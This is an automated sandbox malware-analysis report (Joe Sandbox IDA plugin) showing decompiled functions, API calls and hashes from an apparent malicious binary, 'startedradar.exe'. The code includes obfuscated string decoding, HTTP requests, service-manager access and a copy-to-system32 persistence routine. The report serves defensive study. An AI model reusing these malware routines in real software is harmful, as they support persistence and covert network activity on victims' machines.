Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$DeleteFileFolderFreePathProcess_snwprintf
String ID:
API String ID: 1111569652-0
Opcode ID: a40f241c4bffad6b49aedb1ef5d78bf33a89c3bf9f0dcf64370f016138304de7
Instruction ID: aa46f96ed87f2735db1cb9fdb711ad3d817210fb16bfcb7ee9c40a656837dac9
Opcode Fuzzy Hash: a40f241c4bffad6b49aedb1ef5d78bf33a89c3bf9f0dcf64370f016138304de7
Instruction Fuzzy Hash: EDF03772901128BBDB209BE0EC8DFEB776DEB04356F000192F609D6452DA7149F18BA0

Uniqueness

Uniqueness Score: 7.75%

Function 0011D008, Relevance: 7.5, APIs: 5, Instructions: 18
windowsynchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

TranslateMessage.USER32(?), ref: 0011CFD9
DispatchMessageW.USER32(?), ref: 0011CFE3
WaitForSingleObject.KERNEL32(00000000), ref: 0011CFF1
GetMessageW.USER32 ref: 0011D008
DestroyWindow.USER32 ref: 0011D013

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Message$DestroyDispatchObjectSingleTranslateWaitWindow
String ID:
API String ID: 710846951-0
Opcode ID: 06fe726408872392d1d408f5200cb44ec710da08a5156296561a7c0b0195d259
Instruction ID: b6a16ebc8fe1c99bc0f07b229751eebdf1b429023c3aa8f68cd244a0492135b8
Opcode Fuzzy Hash: 06fe726408872392d1d408f5200cb44ec710da08a5156296561a7c0b0195d259
Instruction Fuzzy Hash: 3EE0EC71901145FBDB296BB4EC5DBAD3B7DEB04702F204020F152D28A0E73494E79B61

Uniqueness

Uniqueness Score: 0.03%

Function 00118311, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
memorylibraryUNIQUE

C-Code - Quality: 71%

			E00118311(void* __esi, void* __eflags) {
				struct HINSTANCE__* _t29;
				int _t31;
				void* _t33;
				struct HINSTANCE__* _t35;
				void* _t36;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t41;

				 *((intOrPtr*)(_t41 - 0x6c)) = 0x57762683;
				 *((intOrPtr*)(_t41 - 0x68)) = 0x592baf94;
				 *((intOrPtr*)(_t41 - 0x64)) = 0xad8fd844;
				 *((intOrPtr*)(_t41 - 0x60)) = 0xba8e947f;
				 *((intOrPtr*)(_t41 - 0x5c)) = 0x75eb77e0;
				 *((intOrPtr*)(_t41 - 0x58)) = 0x6b9a4e89;
				 *((intOrPtr*)(_t41 - 0x54)) = 0x8f463d09;
				 *((intOrPtr*)(_t41 - 0x50)) = 0x445c08e3;
				 *((intOrPtr*)(_t41 - 0x4c)) = 0x9644cebc;
				 *((intOrPtr*)(_t41 - 0x48)) = 0x500c095b;
				 *((intOrPtr*)(_t41 - 0x44)) = 0x1dbceffb;
				 *((intOrPtr*)(_t41 - 0x40)) = 0x10966022;
				 *((intOrPtr*)(_t41 - 0x3c)) = 0xced97c24;
				 *((intOrPtr*)(_t41 - 0x38)) = 0xd2b6aaa3;
				 *((intOrPtr*)(_t41 - 0x34)) = 0xa7ede2e6;
				 *((intOrPtr*)(_t41 - 0x30)) = 0xbfd00c40;
				 *((intOrPtr*)(_t41 - 0x2c)) = 0x506bf409;
				 *((intOrPtr*)(_t41 - 0x28)) = 0x51769f7e;
				 *((intOrPtr*)(_t41 - 0x24)) = 0x4a3b59bb;
				 *((intOrPtr*)(_t41 - 0x20)) = 0x7e8ef40c;
				 *((intOrPtr*)(_t41 - 0x1c)) = 0xc05c293d;
				 *((intOrPtr*)(_t41 - 0x18)) = 0xfd52ddd5;
				 *((intOrPtr*)(_t41 - 0x14)) = 0xca5a685e;
				 *((intOrPtr*)(_t41 - 0x10)) = 0x490ba5f1;
				 *((intOrPtr*)(_t41 - 0xc)) = 0xc8f2a124;
				 *((intOrPtr*)(_t41 - 8)) = 0xf2d76c27;
				 *((intOrPtr*)(_t41 - 4)) = 0x12571069;
				_t39 = L00111D00(0x122cf0, _t36, _t37);
				_t29 = LoadLibraryW(_t39); // executed
				 *0x127c7c = _t29;
				_t31 = HeapFree(GetProcessHeap(), 0, _t39);
				_t35 =  *0x127c7c; // 0x75e80000
				_pop(_t40);
				if(_t35 != 0) {
					goto 0x301714;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00111480(_t33, _t35, _t36, _t37, _t40);
				} else {
					goto 0x301701;
					return _t31;
				}
			}

0x00118311
0x0011831d
0x00118324
0x0011832b
0x00118332
0x00118339
0x00118340
0x00118347
0x0011834e
0x00118355
0x0011835c
0x00118363
0x0011836a
0x00118371
0x00118378
0x0011837f
0x00118386
0x0011838d
0x00118394
0x0011839b
0x001183a2
0x001183a9
0x001183b0
0x001183b7
0x001183be
0x001183c5
0x001183cc
0x001183db
0x001183de
0x001183e7
0x001183f3
0x001183f9
0x001183ff
0x00118402
0x0011840a
0x0011840f
0x00118410
0x00118411
0x00118412
0x00118413
0x00118414
0x00118415
0x00118416
0x00118417
0x00118418
0x00118424
0x00118404
0x00118404
0x00118409
0x00118409

APIs

LoadLibraryW.KERNEL32(00000000), ref: 001183DE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001183EC
HeapFree.KERNEL32(00000000), ref: 001183F3

Strings

wu, xrefs: 00118332

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: wu
API String ID: 872250060-894654108
Opcode ID: 2d9bb329704b5c23340c2299ae400f03e0cff3124298fcbc58d19efebe1aeadc
Instruction ID: 69d4810cda32e82ae9ba7980b059d1111af87ad25eb1c58ca34cdbec2e583f25
Opcode Fuzzy Hash: 2d9bb329704b5c23340c2299ae400f03e0cff3124298fcbc58d19efebe1aeadc
Instruction Fuzzy Hash: E721DBB0C05399EFDF20DFD2A9941EEBEB5BB04701F204009E6122FA54D7B94A52CF95

Uniqueness

Uniqueness Score: 100.00%

Function 001167DC, Relevance: 6.0, APIs: 4, Instructions: 32
memoryCOMMON

C-Code - Quality: 77%

			E001167DC(intOrPtr __ecx, void* __edx, long* __edi) {
				void* _t4;
				void* _t5;
				void* _t9;
				void* _t17;
				void* _t19;

				_t9 = __edx;
				 *((intOrPtr*)(_t19 - 4)) = __ecx;
				_t4 = RtlAllocateHeap(GetProcessHeap(), 8,  *__edi);
				_t17 = _t4;
				if(_t17 == 0) {
					L4:
					goto 0x301546;
					asm("int3");
					return _t4;
				} else {
					_push(_t9);
					_push( *((intOrPtr*)(_t19 - 4)));
					_t5 = L00112D50(_t17, __edi); // executed
					if(_t5 == 0) {
						_t4 = _t17;
						goto L4;
					} else {
						HeapFree(GetProcessHeap(), 0, _t17);
						return 0;
					}
				}
			}

0x001167dc
0x001167de
0x001167ec
0x001167f2
0x001167f6
0x00116827
0x00116827
0x0011682c
0x0011682d
0x001167f8
0x001167f8
0x001167f9
0x00116800
0x0011680a
0x00116825
0x00000000
0x0011680c
0x00116816
0x00116824
0x00116824
0x0011680a

APIs

GetProcessHeap.KERNEL32(00000008), ref: 001167E5
RtlAllocateHeap.NTDLL(00000000), ref: 001167EC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011680F
HeapFree.KERNEL32(00000000), ref: 00116816

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 1e9f41dc77d54538e5beaef3ba04b2f4740d202ebea02fc1980b5cba24f19477
Instruction ID: 97cae728a50fd0f4f6a89eff7889b78923dca796cd2b23a311f5952788e2626e
Opcode Fuzzy Hash: 1e9f41dc77d54538e5beaef3ba04b2f4740d202ebea02fc1980b5cba24f19477
Instruction Fuzzy Hash: E6F0E531B00710FBCB2157E5AC4977DBA6AEF4C713F040079F909C2690EB728C6197A1

Uniqueness

Uniqueness Score: 0.01%

Function 001117E8, Relevance: 6.0, APIs: 4, Instructions: 12
networkCOMMON

C-Code - Quality: 45%

			E001117E8(void* __edx, void* __edi) {
				int _t5;
				void* _t14;
				void* _t20;
				intOrPtr _t22;
				void* _t24;

				_t20 = __edi;
				_t5 = HttpSendRequestW(??, ??, ??, ??, ??); // executed
				if(_t5 != 0) {
					if(L001115C0(_t5, __edi, __edx) == 0xc8) {
						 *((intOrPtr*)(_t24 - 4)) = L00111670(__edi,  *((intOrPtr*)(_t24 + 0x1c)));
					}
				}
				InternetCloseHandle(_t20); // executed
				InternetCloseHandle( *(_t24 - 8));
				_t22 =  *((intOrPtr*)(_t24 - 4));
				InternetCloseHandle(_t14);
				HeapFree(GetProcessHeap(), ??, ??);
				return _t22;
			}

0x001117e8
0x001117e8
0x001117f0
0x00111803
0x0011180f
0x0011180f
0x00111803
0x00111813
0x0011181c
0x00111822
0x00111826
0x00111838
0x00111846

APIs

HttpSendRequestW.WININET ref: 001117E8
InternetCloseHandle.WININET ref: 00111813
InternetCloseHandle.WININET(00000000), ref: 0011181C
InternetCloseHandle.WININET ref: 00111826

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseHandleInternet$HttpRequestSend
String ID:
API String ID: 2722702071-0
Opcode ID: d7708f7b2283a3c31c3748edee17e682c027ebc05fb7c42dc2347dc6b452942c
Instruction ID: 176cf417cc2b22e9944cabaa6980c1444f73d6baeba01d0c6a9df5205428b570
Opcode Fuzzy Hash: d7708f7b2283a3c31c3748edee17e682c027ebc05fb7c42dc2347dc6b452942c
Instruction Fuzzy Hash: 5CD0C936409000FFCB261FA4AD0C56FBB38AB04302B1440D0E502F19B1CB3859A6AB10

Uniqueness

Uniqueness Score: 0.05%

Function 000F2493, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 29stringCOMMON

APIs

lstrcmpW.KERNEL32 ref: 000F24E5

Strings

_E9e3X1YKeRS, xrefs: 000F24B8, 000F24C0
ov8oTdn, xrefs: 000F24B2, 000F24C7

Memory Dump Source

Source File: 00000009.00000002.1910243505.000F0000.00000040.sdmp, Offset: 000F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f0000_startedradar.jbxd

Similarity

API ID: lstrcmp
String ID: _E9e3X1YKeRS$ov8oTdn
API String ID: 1534048567-2173848329
Opcode ID: ed928f827a9acc6992e72ba3060748723296ca5078bd368d551041fc945fa559
Instruction ID: 7d637c2b49ae3f1757e00b31e451c8333a8d0510688387d63113f59bd239dff6
Opcode Fuzzy Hash: ed928f827a9acc6992e72ba3060748723296ca5078bd368d551041fc945fa559
Instruction Fuzzy Hash: 9AF0CDB1D007188FE720CF68EC012687BF0FB49312F0042AACB08ABB54D7382944EF81

Uniqueness

Uniqueness Score: 0.21%

Function 00112468, Relevance: 4.5, APIs: 3, Instructions: 20memorystringCOMMON

APIs

GetProcessHeap.KERNEL32 ref: 00112468
RtlAllocateHeap.NTDLL(00000000), ref: 0011246F
lstrcpyW.KERNEL32(00000004,?), ref: 00112482

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$AllocateProcesslstrcpy
String ID:
API String ID: 3688308991-0
Opcode ID: b3864c09def6524aa5785da4814a840eddd50014948d281fac20b11b4e0ebd68
Instruction ID: 1456a62e4d05a2448d529424ba040422499e90ef0f80667d7f87b79a7438b974
Opcode Fuzzy Hash: b3864c09def6524aa5785da4814a840eddd50014948d281fac20b11b4e0ebd68
Instruction Fuzzy Hash: B8E08679400B15EBC73D4F60C858919BBA5FF18700B008909F5568BA10C7349451CF91

Uniqueness

Uniqueness Score: 0.16%

Function 001117F7, Relevance: 4.5, APIs: 3, Instructions: 16
networkCOMMON

C-Code - Quality: 77%

			E001117F7(void* __edx, void* __edi, void* __eflags) {
				void* _t5;
				void* _t14;
				void* _t20;
				intOrPtr _t22;
				void* _t24;

				_t20 = __edi;
				if(L001115C0(_t5, __edi, __edx) == 0xc8) {
					 *((intOrPtr*)(_t24 - 4)) = L00111670(__edi,  *((intOrPtr*)(_t24 + 0x1c)));
				}
				InternetCloseHandle(_t20); // executed
				InternetCloseHandle( *(_t24 - 8));
				_t22 =  *((intOrPtr*)(_t24 - 4));
				InternetCloseHandle(_t14);
				HeapFree(GetProcessHeap(), ??, ??);
				return _t22;
			}

0x001117f7
0x00111803
0x0011180f
0x0011180f
0x00111813
0x0011181c
0x00111822
0x00111826
0x00111838
0x00111846

APIs

InternetCloseHandle.WININET ref: 00111813
InternetCloseHandle.WININET(00000000), ref: 0011181C
InternetCloseHandle.WININET ref: 00111826

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseHandleInternet
String ID:
API String ID: 1081599783-0
Opcode ID: 7a3f50926734b3c0d6487a4bfe059ec51717b6f3c2a5283b7f37c95a1889b987
Instruction ID: 765354e4b9a57e699f0d9d64727aa1de84aff735125fcaa34c77bd69e1fdf37a
Opcode Fuzzy Hash: 7a3f50926734b3c0d6487a4bfe059ec51717b6f3c2a5283b7f37c95a1889b987
Instruction Fuzzy Hash: E2E01275904004FFCF19AF60D9485BFF776AB85300F144094E502A3691CB384E96AB11

Uniqueness

Uniqueness Score: 0.05%

Function 0011FEB0, Relevance: 3.0, APIs: 2, Instructions: 16
serviceCOMMON

C-Code - Quality: 47%

			E0011FEB0(void* __ecx, void* __edi, void* __esi) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t6;
				void* _t7;
				void* _t15;
				int _t18;
				int _t23;
				void* _t28;
				void* _t33;
				void* _t35;

				_t34 = __esi;
				_t33 = __edi;
				_t28 = __ecx;
				_t6 =  *0x125a04; // 0x3c4e0000
				 *0x126d58 = _t6;
				_push(__esi);
				_t7 = OpenSCManagerW(0, 0, 0xf003f); // executed
				_t49 = _t7;
				if(_t7 != 0) {
					 *0x1263cc = 1; // executed
					CloseServiceHandle(_t7); // executed
				}
				goto 0x301ec4;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("popfd");
				asm("int3");
				memset(??, ??, ??);
				GetModuleFileNameW(0, "C:\Windows\system32\startedradar.exe", 0x104);
				_push(_t28);
				_t35 = L00111C60(0x124360, 0x2f8, _t34);
				_t32 = _t35;
				L0011F610(0x127cd0, _t35);
				E0011F6F0(HeapFree(GetProcessHeap(), 0, _t35), _t35, _t33, _t35);
				_t15 = L0011F870(); // executed
				L0011F900(_t15, _t35); // executed
				L0011F770(0x127cd0, _t35, _t35, _t49); // executed
				_t18 = lstrcmpiW("C:\Windows\system32\startedradar.exe", "C:\Windows\system32\startedradar.exe");
				if(_t18 != 0) {
					L0011FB80(0x127cd0);
					__eflags =  *0x1263cc;
					if( *0x1263cc == 0) {
						goto 0x301ede;
						asm("int3");
						asm("int3");
						asm("int3");
						memset();
						_v92.cb = 0x44;
						_t23 = CreateProcessW("C:\Windows\system32\startedradar.exe", 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v20);
						__eflags = _t23;
						if(_t23 != 0) {
							CloseHandle(_v20);
							_t23 = CloseHandle(_v20.hThread);
						}
						goto 0x301ef4;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						return _t23;
					} else {
						L0011FD90(0x127cd0, _t32, _t35);
						return 1;
					}
				} else {
					return _t18;
				}
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 0011FECA
CloseServiceHandle.ADVAPI32(00000000), ref: 0011FEDF

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseHandleManagerOpenService
String ID:
API String ID: 1199824460-0
Opcode ID: 06557f667ab9f1f4c4de4ae5882537f4d8aa0b6fe6cc045faf737e743f283e7f
Instruction ID: d98ecb3e6257dd49d079ed4c20b01d3c65251d74c94a416d45a9e5b366ad018b
Opcode Fuzzy Hash: 06557f667ab9f1f4c4de4ae5882537f4d8aa0b6fe6cc045faf737e743f283e7f
Instruction Fuzzy Hash: DBD01730241314BBD334DFA9AC4AB663BE8A704B01F000024A50986DE2EBB058E28AA5

Uniqueness

Uniqueness Score: 0.02%

Function 00111C07, Relevance: 3.0, APIs: 2, Instructions: 10COMMON

APIs

Process32FirstW.KERNEL32 ref: 00111C13
CloseHandle.KERNEL32 ref: 00111C51

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseFirstHandleProcess32
String ID:
API String ID: 917458368-0
Opcode ID: 297defbdebf1fd5dcf6fbfd3d7feb47be02f207c49994b6d1ef1e79274300097
Instruction ID: 899f6798bf7606eae5411b6c6cba427b8792413acc94bd9232da61d1ac615abd
Opcode Fuzzy Hash: 297defbdebf1fd5dcf6fbfd3d7feb47be02f207c49994b6d1ef1e79274300097
Instruction Fuzzy Hash: A0C08C3014A014FBD36A1BA1AC0CBBF3A3CAF12305F208400E002D0880CB348AA28EA6

Uniqueness

Uniqueness Score: 0.01%

Function 0011F89E, Relevance: 3.0, APIs: 2, Instructions: 10COMMON

APIs

CreateFileMappingW.KERNELBASE ref: 0011F89E
CloseHandle.KERNEL32 ref: 0011F8E8

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseCreateFileHandleMapping
String ID:
API String ID: 3834335185-0
Opcode ID: 405867940d9d238fe8efd15c5b2633b268c7a750155f4e259d7b9d80a4e65262
Instruction ID: 26564250d457f66f5c72f589bb54f719205cd176afbe719df677fddb5f30f66d
Opcode Fuzzy Hash: 405867940d9d238fe8efd15c5b2633b268c7a750155f4e259d7b9d80a4e65262
Instruction Fuzzy Hash: C8B0223B000A20E3A3222B28B80C0CC2B2AABE03223230033E00282A28EF30C8C30800

Uniqueness

Uniqueness Score: 0.03%

Function 0011177B, Relevance: 3.0, APIs: 2, Instructions: 9networkCOMMON

APIs

InternetConnectW.WININET ref: 0011177B
InternetCloseHandle.WININET ref: 00111826

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Internet$CloseConnectHandle
String ID:
API String ID: 2442674352-0
Opcode ID: 5686ca612ccfddcc610ae778141ceb3fea6ef734ac0e3f57a17853af0304df8e
Instruction ID: 6321e0d60d43f4ca22bce77e1fef16c167f089b44cde2e0b664d6bebb3b9d6c7
Opcode Fuzzy Hash: 5686ca612ccfddcc610ae778141ceb3fea6ef734ac0e3f57a17853af0304df8e
Instruction Fuzzy Hash: 6FC02B79006204FFC32B0B685C0CA9BFAF89784301B314082D40BD3A80DF3144838B10

Uniqueness

Uniqueness Score: 0.04%

Function 00112766, Relevance: 3.0, APIs: 2, Instructions: 8
memoryCOMMON

C-Code - Quality: 100%

			E00112766(signed int __eax) {
				long _t3;
				void* _t5;
				void* _t6;

				_t3 = __eax *  *(_t6 + 0x10);
				_t5 = RtlAllocateHeap(GetProcessHeap(), 8, _t3); // executed
				return _t5;
			}

0x00112766
0x00112774
0x0011277b

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 0011276D
RtlAllocateHeap.NTDLL(00000000), ref: 00112774

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 988c3c7fc43c5e82453dd5bdb550b4b74ce47f75df3bfe835c8e7fbc348b3734
Instruction ID: ebdeaa7959611d06e3c06a9ee0dc620d2006189774d796f81af3cdbffbdb76de
Opcode Fuzzy Hash: 988c3c7fc43c5e82453dd5bdb550b4b74ce47f75df3bfe835c8e7fbc348b3734
Instruction Fuzzy Hash: AAB09272040605FBDB109FE0AC8DE7E3B2DFB88702F480405B60DC58A0CA3080718B20

Uniqueness

Uniqueness Score: 0.01%

Function 00111C38, Relevance: 3.0, APIs: 2, Instructions: 7COMMON

APIs

Process32NextW.KERNEL32 ref: 00111C38
CloseHandle.KERNEL32 ref: 00111C51

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseHandleNextProcess32
String ID:
API String ID: 4007157957-0
Opcode ID: 21547bb46f6f5d16b407ddb4e55b120629e143bfd044d7a81cd1abc7e3d93862
Instruction ID: 31d6e7dc6a28192763eb7f638a95b9d3472ec7d4f38fb2429705be6300dd0954
Opcode Fuzzy Hash: 21547bb46f6f5d16b407ddb4e55b120629e143bfd044d7a81cd1abc7e3d93862
Instruction Fuzzy Hash: 9BB0922024F000E7826A0B656C18BA92A286A12B457148811E002C4C90CB2085F2AD66

Uniqueness

Uniqueness Score: 0.01%

Function 00116790, Relevance: 2.5, APIs: 2, Instructions: 20
memoryCOMMON

C-Code - Quality: 86%

			E00116790(void* __ebx, void* __esi, void* __eflags) {
				void* _t1;
				void* _t2;
				void* _t11;

				_t11 = __esi;
				_t1 = L00112980(__esi, __ebx); // executed
				if(_t1 == 0) {
					_t2 = _t11;
					goto 0x301518;
					asm("int3");
					return _t2;
				} else {
					HeapFree(GetProcessHeap(), 0, _t11);
					return 0;
				}
			}

0x00116790
0x00116794
0x0011679e
0x001167b9
0x001167bb
0x001167c0
0x001167c1
0x001167a0
0x001167aa
0x001167b8
0x001167b8

APIs

GetProcessHeap.KERNEL32(00000000), ref: 001167A3
HeapFree.KERNEL32(00000000), ref: 001167AA

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 30d3ff2120387eb3ddefb818e7a33cd050098f784fff495fca0c221b2d67d6f4
Instruction ID: e600de6a823f60190ce0df7331bb1d508393f86ee2007c5fdacacff2f8bac937
Opcode Fuzzy Hash: 30d3ff2120387eb3ddefb818e7a33cd050098f784fff495fca0c221b2d67d6f4
Instruction Fuzzy Hash: 70D0A72670411493C72117B93C493AEB789DB89317F440075FE0DC55C1DA62846142D1

Uniqueness

Uniqueness Score: 0.01%

Function 00111749, Relevance: 1.5, APIs: 1, Instructions: 17networkCOMMON

APIs

InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00111760

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 7cf3b35019c79377f1064d38756f9b347b9ad15a2382b8dffa352b092143a472
Instruction ID: 869aeaac03bfcccf24a972e8998f279490dfdd2c858e7e2c20c940b811736c2e
Opcode Fuzzy Hash: 7cf3b35019c79377f1064d38756f9b347b9ad15a2382b8dffa352b092143a472
Instruction Fuzzy Hash: 52D05E74902225BBC73A8BE648585EFADACDE05350B10807B690992601DB708941CAD1

Uniqueness

Uniqueness Score: 0.05%

Function 0011F6F1, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

C-Code - Quality: 100%

			E0011F6F1(void* __eax, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				void* _t19;

				_t15 = __edi;
				 *((intOrPtr*)(_t19 + __edx - 0x17)) =  *((intOrPtr*)(_t19 + __edx - 0x17)) + __edx;
			}

0x0011f6f1
0x0011f6f6

APIs

SHGetFolderPathW.SHELL32 ref: 0011F706

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: ee032614f5dd88f5b0f5fde09e3fa374778a5587cc8269cc70060db1a0fd7085
Instruction ID: 58c7017fc90664c671772e86fb57b6ae0cc1013ea7426cf0c07d57307b9007ca
Opcode Fuzzy Hash: ee032614f5dd88f5b0f5fde09e3fa374778a5587cc8269cc70060db1a0fd7085
Instruction Fuzzy Hash: BEC02B3440C0978BC33A0B2139941F83F70BE123007250C3CC0C644C90E310111A9710

Uniqueness

Uniqueness Score: 0.01%

Function 0011CE19, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

C-Code - Quality: 100%

			E0011CE19(void* __eax, void* __eflags) {
				intOrPtr* _t2;
				long _t3;
				void* _t4;
				void* _t5;
				void* _t9;

				_t9 = __eflags;
				_t2 = __eax + 0x127c98;
				 *_t2 =  *_t2 + _t2;
				 *_t2 =  *_t2 + _t2;
				_t3 = GetTickCount();
				_t4 = L0011CB20(_t5, _t9); // executed
				 *0x127c98 = 3;
				 *0x127c94 = _t3 + _t4;
				return _t4;
			}

0x0011ce19
0x0011ce19
0x0011ce1e
0x0011ce20
0x0011ce22
0x0011ce2a
0x0011ce31
0x0011ce3b
0x0011ce42

APIs

GetTickCount.KERNEL32 ref: 0011CE22

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
